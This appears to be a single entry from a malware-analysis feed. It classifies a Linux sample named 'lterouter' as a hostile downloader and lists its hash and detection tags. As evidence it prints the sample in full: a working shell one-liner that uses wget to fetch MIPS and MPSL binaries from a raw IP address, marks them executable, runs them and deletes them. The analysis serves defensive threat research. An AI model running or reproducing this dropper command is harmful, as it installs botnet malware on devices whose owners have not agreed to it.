Hostile 100% linux Download

lterouter

Downloads and executes remote malware

Raw IP literal download chmod local executeLocal ./ file invocation
SHA-256eaac155db9d225589eb118add6b531bbf52ec21d1233a2ef468083696dedaf61

Evidence

wget downloads HTTP literal path lines 1–5
1 cd /dev;wget http://103.83.86.215/n2/mpsl;chmod +x mpsl; /dev/mpsl lte; wget http://103.83.86.215/n2/mips;chmod 755 mips;./mips lte;rm -r mips mpsl
2
3
4
5

Keyboard shortcuts on this page: j for the next sample, k for the previous one, x to go back to the feed, d to download the original bytes, r to re-queue the sample for analysis.